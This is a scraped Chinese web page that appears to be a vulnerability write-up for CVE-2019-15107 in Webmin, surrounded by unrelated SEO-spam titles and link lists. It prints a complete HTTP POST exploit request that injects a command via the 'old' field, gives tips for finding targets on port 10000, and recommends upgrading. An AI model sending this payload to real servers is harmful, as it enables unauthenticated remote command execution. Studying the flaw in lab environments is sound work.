当前位置: 首页 > news >正文

python编程软件安装教程重庆seo推广服务

python编程软件安装教程,重庆seo推广服务,怎么创建网站域名,在招聘网站做销售漏洞编号 CVE-2019-15107 漏洞描述 Webmin是一个基于Web的系统配置工具&#xff0c;用于类Unix系统。密码重置页面中存在此漏洞&#xff0c;允许未经身份验证的用户通过简单的 POST 请求执行任意命令。 影响版本 Webmin<1.920 漏洞评级 严重 利用方法&#xff08;利…

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

构造payload

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

直接利用payload即可 

漏洞挖掘

可以根据网站指纹信息

10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi

加固建议

升级到1.930版本

漏洞分类

远程代码执行漏洞

参考链接

Vulhub - 用于漏洞环境的 Docker-Compose 文件

 

http://www.shuangfujiaoyu.com/news/31029.html

相关文章:

  • 做编程的 网站百度近日收录查询
  • 做网站流量优化都是什么企业管理软件排名
  • 定制网站建设设计公司推广运营怎么做
  • 做效果图的兼职网站seo高效优化
  • 网站开发后台 amp长沙网站优化培训
  • 网站后台做链接深圳推广系统
  • 深圳公司注销流程seo优化行业
  • 网站建设和销售有关吗宁波网站建设网站排名优化
  • 企业品牌营销策划公司长沙seo关键词排名
  • 做pc端网站代理商企业网络营销方法
  • 深圳全网营销网站全网关键词云怎么查
  • 简述企业网站建设的主要步骤百度推广首页
  • 企业网站建设的公司seo是什么专业
  • 什么网站可以做任务赚钱自己开发网站
  • wordpress手机端网站公司注册流程
  • 泰州市统计局网站建设方案响应式网站建设
  • 自己做网站靠什么赚钱吗免费技能培训网
  • 网站初期如何推广的怎样推广自己的店铺啊
  • 网站 速度 测试网站开发从入门到实战
  • 网站排名推广推荐可以免费网络推广网站
  • 北京移动端网站公司百度视频排名优化
  • 电子商务企业网站建设规划方案餐饮培训
  • 做高仿批发的网站有哪些seo怎么做最佳
  • 做网站用宋体有版权问题吗品牌推广的意义
  • 做网站要什么颜色模式网络建站流程
  • nas搭建网站软文推广一般发布在哪些平台
  • 移动端网站如何做导出功能网络营销推广策划
  • 温州手机网站建设seo点击优化
  • 网站模板预览免费b站推广网站详情
  • 手机免费网站空间线上网络推广怎么做